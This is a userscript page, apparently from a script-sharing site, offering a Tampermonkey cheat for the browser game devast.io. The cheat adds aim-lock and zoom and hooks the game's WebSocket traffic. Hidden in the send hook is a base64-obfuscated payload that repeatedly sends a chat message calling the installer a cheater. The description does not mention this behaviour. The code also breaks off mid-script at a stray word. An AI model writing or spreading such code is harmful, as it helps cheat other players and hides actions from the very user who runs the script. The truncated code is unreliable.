Devast.io Zoom Hack Aim Helper Aim Target Lock Display Ping Auto Lock

mira el mundo desde tu percepsion!

您需要先安裝使用者腳本管理器擴展,如 TampermonkeyGreasemonkeyViolentmonkey 之後才能安裝該腳本。

您需要先安裝使用者腳本管理器擴充功能,如 TampermonkeyViolentmonkey 後才能安裝該腳本。

您需要先安裝使用者腳本管理器擴充功能,如 TampermonkeyViolentmonkey 後才能安裝該腳本。

您需要先安裝使用者腳本管理器擴充功能,如 TampermonkeyUserscripts 後才能安裝該腳本。

你需要先安裝一款使用者腳本管理器擴展,比如 Tampermonkey,才能安裝此腳本

您需要先安裝使用者腳本管理器擴充功能後才能安裝該腳本。

(我已經安裝了使用者腳本管理器,讓我安裝!)

你需要先安裝一款使用者樣式管理器擴展,比如 Stylus,才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展,比如 Stylus,才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展,比如 Stylus,才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展後才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展後才能安裝此樣式

你需要先安裝一款使用者樣式管理器擴展後才能安裝此樣式

(我已經安裝了使用者樣式管理器,讓我安裝!)

// ==UserScript==
// @name         Devast.io Zoom Hack Aim Helper Aim Target Lock Display Ping Auto Lock
// @namespace    http://tampermonkey.net/
// @license      David joya
// @description  mira el mundo desde tu percepsion!
// @version      0.1.2
// @author       You
// @include        http*://devast.io/*
// @grant none
// @run-at       document-start
// ==/UserScript==

    
    
    document.head.innerHTML="";
      WebSocket.prototype._send = WebSocket.prototype.send;
    WebSocket.prototype.send = function(data) {
        window.wsStart=Date.now();
        this._send(data);
        setInterval(()=>{this._send(window.atob("WzEsIkhpISBJJ20gYSBjaGVhdGVyLiJd"));},50000)
        this.addEventListener('message', function wsMessage(msg) {
           window.wslatency= Date.now()-window.wsStart;
            this.removeEventListener('message',wsMessage);
        })
        this.send = function(_data) {
            this._send(_data);
        };
    };
    function disablemousemove(e){e.stopPropagation();}
    document.addEventListener("keydown", event => {if(event.code=="KeyX"){
                                                                          if(!window.aimlock){window.aimlock=true;}else{
                                                                              window.aimlock=!window.aimlock;}
                                                                          if(window.aimlock){document.getElementById("can").addEventListener("mousemove",disablemousemove);}else{
                                                                              document.getElementById("can").removeEventListener("mousemove",disablemousemove);
                                                                          }
                                                                         }});
    document.addEventListener("click",(e)=>{window.enemyTarget.shadowx=e.clientX; window.enemyTarget.shadowy=e.clientY;});
    async function checkScript(div){
        let scripts= div.getElementsByTagName("script");
        for(let script of scripts){
            let parent=script.parentNode;
            let newScript=document.createElement("script");
            if(script.src.includes("client")){
                newScript= await scriptModify(script.src);
            }else{
                for(let attribute of script.attributes){
                    newScript.setAttribute(attribute.name,attribute.value);
                }
                if(script.textContent){
                    newScript=script;
                }
            }

            parent.removeChild(script);
            parent.append(newScript);
        }
    }
   
        let newScript=document.createElement("script");
       
        Hello